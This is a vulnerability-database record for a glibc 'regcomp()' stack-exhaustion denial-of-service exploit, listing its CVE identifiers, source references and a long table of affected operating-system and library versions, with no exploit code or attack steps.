Details of VAR-E-201010-0031

ID

VAR-E-201010-0031

CVE

cve_id:	CVE-2010-4052	Trust: 3.4
cve_id:	CVE-2010-4051	Trust: 1.8
cve_id:	CVE-2011-0418	Trust: 1.8
cve_id:	CVE-2010-2632	Trust: 1.3
cve_id:	CVE-2011-3336	Trust: 1.0

sources: BID: 43819 // BID: 45233 // BID: 47671 // PACKETSTORM: 106589 // PACKETSTORM: 94556 // PACKETSTORM: 120032 // PACKETSTORM: 125725 // PACKETSTORM: 97315 // PACKETSTORM: 101052 // EXPLOIT-DB: 35061 // EDBNET: 56301

EDB ID

35061

TITLE

GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service - Linux dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35061

DESCRIPTION

GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service. CVE-2010-4052CVE-70447 . dos exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 35061

AFFECTED PRODUCTS

vendor:	multiple	model:	vendors libc/glob	scope:	-	version:	-	Trust: 1.0
vendor:	gnu	model:	glibc	scope:	-	version:	-	Trust: 1.0
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.7	Trust: 0.9
vendor:	netbsd	model:	netbsd	scope:	eq	version:	5.0.2	Trust: 0.6
vendor:	netbsd	model:	netbsd	scope:	eq	version:	5.0	Trust: 0.6
vendor:	freebsd	model:	8.2-stable	scope:	-	version:	-	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.5	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5	Trust: 0.6
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.6	Trust: 0.6
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.5	Trust: 0.6
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.4	Trust: 0.6
vendor:	bsd	model:	libc/regcomp	scope:	-	version:	-	Trust: 0.5
vendor:	freebsd	model:	ftpd remote	scope:	eq	version:	9.1	Trust: 0.5
vendor:	os	model:	safari firefox regex	scope:	eq	version:	x//	Trust: 0.5
vendor:	gnu	model:	libc/regcomp	scope:	-	version:	-	Trust: 0.5
vendor:	tnftpd	model:	tnftpd	scope:	eq	version:	20091122	Trust: 0.3
vendor:	tnftpd	model:	tnftpd	scope:	eq	version:	20081009	Trust: 0.3
vendor:	tnftpd	model:	tnftpd	scope:	eq	version:	20080929	Trust: 0.3
vendor:	tnftpd	model:	tnftpd	scope:	eq	version:	20080609	Trust: 0.3
vendor:	sun	model:	solaris 9 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 9 sparc	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 8 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 8 sparc	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris express	scope:	eq	version:	11	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	11	Trust: 0.3
vendor:	sun	model:	solaris 10 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 10 sparc	scope:	-	version:	-	Trust: 0.3
vendor:	openbsd	model:	-current	scope:	-	version:	-	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	4.0.1	Trust: 0.3
vendor:	netbsd	model:	current	scope:	-	version:	-	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	4.0	Trust: 0.3
vendor:	juniper	model:	networks junos	scope:	eq	version:	10.4	Trust: 0.3
vendor:	gnu	model:	glibc2	scope:	eq	version:	2.3.10	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.11.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.11.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.10.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.5	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.10	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.4	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2	Trust: 0.3
vendor:	gnu	model:	glibc and greater	scope:	eq	version:	2.1.9	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.9	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.3-10	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.1-6	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.6	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.5	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.4	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.7	Trust: 0.3
vendor:	gnu	model:	cfengine	scope:	eq	version:	1.2.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.0.x	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	6.0	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	6.0	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	5.5	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.5	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.4	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.4	Trust: 0.3
vendor:	freebsd	model:	-prerelease	scope:	eq	version:	5.4	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	5.3	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.3	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.3	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.2	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.2	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	-release/alpha	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	-release-p5	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.0.x	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	-release-p14	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	alpha	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-release-p3	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-release-p20	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.10	Trust: 0.3
vendor:	freebsd	model:	-release-p8	scope:	eq	version:	4.10	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.10	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.10	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.9	Trust: 0.3
vendor:	freebsd	model:	-prerelease	scope:	eq	version:	4.9	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.9	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.8	Trust: 0.3
vendor:	freebsd	model:	-release-p7	scope:	eq	version:	4.8	Trust: 0.3
vendor:	freebsd	model:	-prerelease	scope:	eq	version:	4.8	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.8	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	-release-p17	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.6.2	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	-release-p20	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	-stablepre2002-03-07	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-release-p32	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.4	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.4	Trust: 0.3
vendor:	freebsd	model:	-release-p42	scope:	eq	version:	4.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.4	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	-release-p38	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	-stablepre122300	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	-stablepre050201	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.1.1	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.1.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.1.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.0.x	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.0	Trust: 0.3
vendor:	freebsd	model:	alpha	scope:	eq	version:	4.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.0	Trust: 0.3
vendor:	freebsd	model:	-stablepre2001-07-20	scope:	eq	version:	3.5.1	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	3.5.1	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	3.5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.5x	Trust: 0.3
vendor:	freebsd	model:	-stablepre122300	scope:	eq	version:	3.5	Trust: 0.3
vendor:	freebsd	model:	-stablepre050201	scope:	eq	version:	3.5	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	3.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.4x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.3x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.2x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.1x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.1	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	3.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.8	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.6	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.7.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.6.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.6	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.0.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.1.5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.1.5	Trust: 0.3
vendor:	freebsd	model:	9.0-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	9.0-release	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	9.0-rc3	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	9.0-rc1	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.2-release-p2	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.2-release-p1	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	release -p3	scope:	eq	version:	8.2-	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	8.2	Trust: 0.3
vendor:	freebsd	model:	8.1-release-p5	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.1-release-p4	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.1-release	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.1-prerelease	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	8.1	Trust: 0.3
vendor:	freebsd	model:	8.0-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.0-release	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.4-release-p2	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-release-p3	scope:	eq	version:	7.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.4	Trust: 0.3
vendor:	freebsd	model:	7.3-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.3-release-p6	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.3-release-p1	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	release p7	scope:	eq	version:	7.3--	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.3	Trust: 0.3
vendor:	freebsd	model:	7.2-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.2-release-p4	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.2-release-p1	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.2-rc2	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.2-prerelease	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.2	Trust: 0.3
vendor:	freebsd	model:	7.1-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.1-release-p6	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.1-release-p5	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.1-release-p4	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-release-p2	scope:	eq	version:	7.1	Trust: 0.3
vendor:	freebsd	model:	-release-p1	scope:	eq	version:	7.1	Trust: 0.3
vendor:	freebsd	model:	-pre-release	scope:	eq	version:	7.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.1	Trust: 0.3
vendor:	freebsd	model:	7.0-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release-p8	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release-p3	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release-p12	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release-p11	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	beta4	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	-release-p9	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	-prerelease	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	6.4-releng	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	6.4-release-p5	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	6.4-release-p4	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	6.4-release-p2	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	6.4	Trust: 0.3
vendor:	freebsd	model:	-release-p3	scope:	eq	version:	6.4	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	6.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.4	Trust: 0.3
vendor:	freebsd	model:	6.3-release-p11	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	6.3-release-p10	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	-release-p9	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	-release-p8	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	-release-p6	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	6.2	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	6.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.2	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	6.1	Trust: 0.3
vendor:	freebsd	model:	-release-p10	scope:	eq	version:	6.1	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	6.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.1	Trust: 0.3
vendor:	freebsd	model:	6.0-releng	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-release-p5	scope:	eq	version:	6.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.5	Trust: 0.3
vendor:	freebsd	model:	5.4-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.0.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.0	Trust: 0.3
vendor:	avaya	model:	cms server	scope:	eq	version:	16.2	Trust: 0.3
vendor:	avaya	model:	cms server	scope:	eq	version:	16.1	Trust: 0.3
vendor:	avaya	model:	cms server	scope:	eq	version:	16.0	Trust: 0.3
vendor:	avaya	model:	cms server	scope:	eq	version:	15.0	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.6	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.4	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.3	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.2	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.1	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.8	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.7	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.6	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.5	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.4	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.3	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.2	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.1	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.7	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6	Trust: 0.3
vendor:	freebsd	model:	8.3-stable	scope:	ne	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.4-stable	scope:	ne	version:	-	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	ne	version:	x10.6.8	Trust: 0.3
vendor:	mozilla	model:	firefox	scope:	eq	version:	27.0.1	Trust: 0.3
vendor:	kaspersky	model:	kaspersky	scope:	eq	version:	14.0.0.4651	Trust: 0.3
vendor:	juniper	model:	junose	scope:	eq	version:	11.3.3	Trust: 0.3
vendor:	juniper	model:	junose	scope:	eq	version:	10.3	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.1	Trust: 0.3
vendor:	juniper	model:	junos 13.2r1	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 13.1r3	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 13.1r2	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 13.1r1	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	13.1	Trust: 0.3
vendor:	juniper	model:	junos 12.3r3	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.3r2	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	12.3	Trust: 0.3
vendor:	juniper	model:	junos 12.2r4	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.2r3	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	12.2	Trust: 0.3
vendor:	juniper	model:	junos 12.1x45-d10	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	12.1x45	Trust: 0.3
vendor:	juniper	model:	junos 12.1x44-d20	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.1x44-d15	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	12.1x44	Trust: 0.3
vendor:	juniper	model:	junos 12.1r7-s1	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.1r7	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.1r6	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.1r5-s3	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.1r3	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	12.1	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	11.4x27.44	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	11.4x27.43	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	11.4x27	Trust: 0.3
vendor:	juniper	model:	junos 11.4r9	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r8	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r7-s2	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r7-s1	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r7	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r6.6	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r6-s2	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r5.5	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r5-s2	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r3.7	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r1	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	11.4	Trust: 0.3
vendor:	juniper	model:	junos 11.2r2	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.2r1	scope:	-	version:	-	Trust: 0.3
